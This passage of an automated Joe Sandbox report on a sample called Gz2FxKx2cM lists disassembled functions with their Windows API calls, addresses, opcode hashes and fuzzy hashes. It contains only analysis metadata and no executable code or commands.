                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 71f23b1496506a89354c536aed0fcbfa8398bcde95d0393c9c2bb49d5dfa3a98
                                          • Instruction ID: b7f9f3865403b88753f83bffb02fe6e5237d336dbebbb8c7098c158637cfefd0
                                          • Opcode Fuzzy Hash: 71f23b1496506a89354c536aed0fcbfa8398bcde95d0393c9c2bb49d5dfa3a98
                                          • Instruction Fuzzy Hash: AA21BF726006049FDB10EF64C845B6EBBA9EF89720F148269F85AE73D2CB70AD01DB51
                                          Function 00915520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • _memmove.LIBCMT ref: 00950258
                                          • _memmove.LIBCMT ref: 0095036D
                                          • _memmove.LIBCMT ref: 00950414
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 93d11fc3ee1fb75c668b5945ef404f783791e82e6e862a43ffd5072950925d59
                                          • Instruction ID: 23404ee65b14bbf830efb833433ed57a2ecdbac15c27fb78bc1242d8be9e081b
                                          • Opcode Fuzzy Hash: 93d11fc3ee1fb75c668b5945ef404f783791e82e6e862a43ffd5072950925d59
                                          • Instruction Fuzzy Hash: 0F02BF70A00209DFCF04DF65D982AAEBBB5FFC4310F168469E80ADB295EB35D954CB91
                                          Function 00901287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 009019FA
                                          • GetSysColor.USER32(0000000F), ref: 00901A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00901A61
                                            • Part of subcall function 00901290: DefDlgProcW.USER32(?,00000020,?), ref: 009012D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 1ed49fd37c256f94253db6a358376e2d94078a0622d3062c7cf5a35e0a86708b
                                          • Instruction ID: 223c0c5f1cd5a9dfdaa4afebd99f2b66fee6e88adef12a6cd1caca86f0ee16bf
                                          • Opcode Fuzzy Hash: 1ed49fd37c256f94253db6a358376e2d94078a0622d3062c7cf5a35e0a86708b
                                          • Instruction Fuzzy Hash: F3A1ACB1216944BFEB39AB689C58F7F359CDF81345F14051AF602D22E2CB299D40D7B2
                                          Function 0096BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096BCE6
                                          • _wcscmp.LIBCMT ref: 0096BD16
                                          • _wcscmp.LIBCMT ref: 0096BD2B
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096BD3C
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0096BD6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 51e5a88f6249bb1df8da012bc9feb37af1643ccf768f3f1534a893ebbd4f7cca
                                          • Instruction ID: 9bb9c9713571efee3c915afb8c465e915ab99aa96993ed7766c002a767eb6f30
                                          • Opcode Fuzzy Hash: 51e5a88f6249bb1df8da012bc9feb37af1643ccf768f3f1534a893ebbd4f7cca
                                          • Instruction Fuzzy Hash: D1518DB56046029FC714DF68D4A0E9AB3E8EF89324F10451DF95ACB3A1EB30ED44CB91
                                          Function 00976747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00977D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00977DB6
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0097679E
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009767C7
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00976800
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0097680D
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00976821
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: a7c48faefdf4836b19c22d3df23c9e3841241f8e7c71a33df1ef702ea5b8404a
                                          • Instruction ID: b4f7d100ac16f95b5d1acd2d632326cef5d9dda769a71e0fb4910e9e3137bd0a
                                          • Opcode Fuzzy Hash: a7c48faefdf4836b19c22d3df23c9e3841241f8e7c71a33df1ef702ea5b8404a
                                          • Instruction Fuzzy Hash: 8141D376B00600AFDB10AF248C86F6E77A8DF85714F04C558FE5AAB3C3DA709D009791
                                          Function 00985376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 538ddb3e0f939f274b538f5b3ce1a90085c95f76941420c8e4ea7ca88c438f85
                                          • Instruction ID: e7f01154a9eca2389c091f6bd5227544a9af8415944b45c1dbe5de2fc595aab7
                                          • Opcode Fuzzy Hash: 538ddb3e0f939f274b538f5b3ce1a90085c95f76941420c8e4ea7ca88c438f85
                                          • Instruction Fuzzy Hash: D211B231300915AFEB217F269C54B6A7B9DEF847A1B428439F845D3351DB74DD0587A0
                                          Function 009580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009580C0
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009580CA
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009580D9
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009580E0
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009580F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 34e3010a295a758d707f815ef3a1cc4876096861437ceb9ffbe0630b19e90eaa
                                          • Instruction ID: 8c1e982c5e6bc4b674ef2ae3fcc64b53bc3c1184c1f941b966c13fbd6701ed23
                                          • Opcode Fuzzy Hash: 34e3010a295a758d707f815ef3a1cc4876096861437ceb9ffbe0630b19e90eaa
                                          • Instruction Fuzzy Hash: F4F0623126C704EFEB108FA5EC9DE673BACEF49755B100025F945D6250DB619C45EB60
                                          Function 0096C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0096C432
                                          • CoCreateInstance.OLE32(00992D6C,00000000,00000001,00992BDC,?), ref: 0096C44A
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • CoUninitialize.OLE32 ref: 0096C6B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 28ccc22a9c1d8ceefce61f3aab63967cb334a0e66b31ed99e4630dd69aa7b31c
                                          • Instruction ID: 0ed98173be1d449237e8b9c527a52de5badbef3b93d7648da5998705c8fe558c
                                          • Opcode Fuzzy Hash: 28ccc22a9c1d8ceefce61f3aab63967cb334a0e66b31ed99e4630dd69aa7b31c
                                          • Instruction Fuzzy Hash: BAA12AB1204205AFD700EF54C891EABB7E8EFD5354F00491DF595972E2EB71EA09CB52
                                          Function 00904B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904AD0), ref: 00904B45
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00904B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 7643c7c309df2738505231ac9bbb7162c377f0de6193cb40e838f31360a50286
                                          • Instruction ID: 7651dff04586e28ed058f2296269e2a1389d75b71fe60badba72f1f80d937a69
                                          • Opcode Fuzzy Hash: 7643c7c309df2738505231ac9bbb7162c377f0de6193cb40e838f31360a50286
                                          • Instruction Fuzzy Hash: 9ED01275A14713CFD720AF32D838B0676D8AF45755B1198399485D6290D674D480C754
                                          Function 00913030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID:
                                          • API String ID: 674341424-0
                                          • Opcode ID: fe8f504c8542b67e48765ed8cd7e0fa125a51f1b8ae6eaf08d85c7307bae2c46
                                          • Instruction ID: ad69e2e5cdb124bc76cbdde0e7fcd8824d537b92e0e86b9258d1a7fd433ec24d
                                          • Opcode Fuzzy Hash: fe8f504c8542b67e48765ed8cd7e0fa125a51f1b8ae6eaf08d85c7307bae2c46
                                          • Instruction Fuzzy Hash: D7228AB16083059FC724DF24C881BABB7F8AFC5310F00891DF99A97292DB75E945CB92
                                          Function 0097EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0097EE3D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0097EE4B
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0097EF0B
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0097EF1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: fea689619e2cf996a7050d09bc8ecb17e4b01ac3a7ca325769b71f2deea1f29e
                                          • Instruction ID: f38babc7c8a66f7f4ca60b7c0d0610a433f23288e5a01979c8fb048807e3534e
                                          • Opcode Fuzzy Hash: fea689619e2cf996a7050d09bc8ecb17e4b01ac3a7ca325769b71f2deea1f29e
                                          • Instruction Fuzzy Hash: 6D516D72508711AFD310EF24DC85F6BB7E8EFD8710F50492DF995962A1EB70A904CB92
                                          Function 0095E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0095E628
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: f9af49a52b081053d087c2463899493f9df16d396c50530cc9601d17216e07f1
                                          • Instruction ID: a8c75cbd65c60818ef12789acac70de4aadceda4a5a375b4f114e5e764b09da8
                                          • Opcode Fuzzy Hash: f9af49a52b081053d087c2463899493f9df16d396c50530cc9601d17216e07f1
                                          • Instruction Fuzzy Hash: EE323775A007059FDB28CF2AC481A6AB7F4FF48320B15C56EE89ADB3A1D771E941CB44
                                          Function 009722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0097180A,00000000), ref: 009723E1
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00972418
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 9743de953d1a4956069d6c152dd6c95bf4331739d233d12debb8102c7b53a34d
                                          • Instruction ID: 1aaee1cea730bcb2094582c6931f2501a206704c639ba8475d86034a6fc75fe9
                                          • Opcode Fuzzy Hash: 9743de953d1a4956069d6c152dd6c95bf4331739d233d12debb8102c7b53a34d
                                          • Instruction Fuzzy Hash: 00410672924209FFEB20DF95DC81FBB77BCEB80714F10806AF609A7251EA759E419650
                                          Function 0096B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096B40B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0096B465
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0096B4B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 9f0ac7a205dfe3161ee2ea976df9dc5ffdf12faec6d75ee0c0d6925057d91a6c
                                          • Instruction ID: 2dfee0dd172659781187da7c8223412378d2908e793279daef6d167e9aaaf9fb
                                          • Opcode Fuzzy Hash: 9f0ac7a205dfe3161ee2ea976df9dc5ffdf12faec6d75ee0c0d6925057d91a6c
                                          • Instruction Fuzzy Hash: E9217175A10108EFCB00EFA5D884EEDBBB8FF89310F1480A9E905EB362DB319955DB50
                                          Function 009587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                          • GetLastError.KERNEL32 ref: 00958865
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: d8f67a6f381c0445407269161a0bf5126c48c4390e744b47b03f06767d316c3a
                                          • Instruction ID: 28eec798c2ff9760a19f9c6a28b94934eb278ce143a6eeb7076279287e2f0384
                                          • Opcode Fuzzy Hash: d8f67a6f381c0445407269161a0bf5126c48c4390e744b47b03f06767d316c3a
                                          • Instruction Fuzzy Hash: 34118FB2414305AFE718DFA4EC85D6BB7FCEB44711B20852EF85597251EB30BC448B60
                                          Function 0095874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00958774
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0095878B
                                          • FreeSid.ADVAPI32(?), ref: 0095879B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: b6964d5252fe8454401a739ae7448d4acdf452895b5e3252f032b798792df095
                                          • Instruction ID: 679b02ecfaf64e633afa71101cfa3119084f20a91811fe19d91ae50854591abe
                                          • Opcode Fuzzy Hash: b6964d5252fe8454401a739ae7448d4acdf452895b5e3252f032b798792df095
                                          • Instruction Fuzzy Hash: DAF04975A1130CBFDF00DFF4DC99AAEBBBCEF08301F1044A9A901E2281E7756A049B50
                                          Function 0096C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096C6FB
                                          • FindClose.KERNEL32(00000000), ref: 0096C72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 50e009f8d9d8936b24887f568e2d8ebcc1b5a22796fd5a6201d3c83d6ba4f9da
                                          • Instruction ID: 0c98f94398006fd3e755e8d967b3cd6b67917b9697a15ade329aecc09c1dec90
                                          • Opcode Fuzzy Hash: 50e009f8d9d8936b24887f568e2d8ebcc1b5a22796fd5a6201d3c83d6ba4f9da
                                          • Instruction Fuzzy Hash: 81118E726002009FDB10DF29C845A2AF7E8EF85320F00C51EF8A9C7391DB30E805CB81
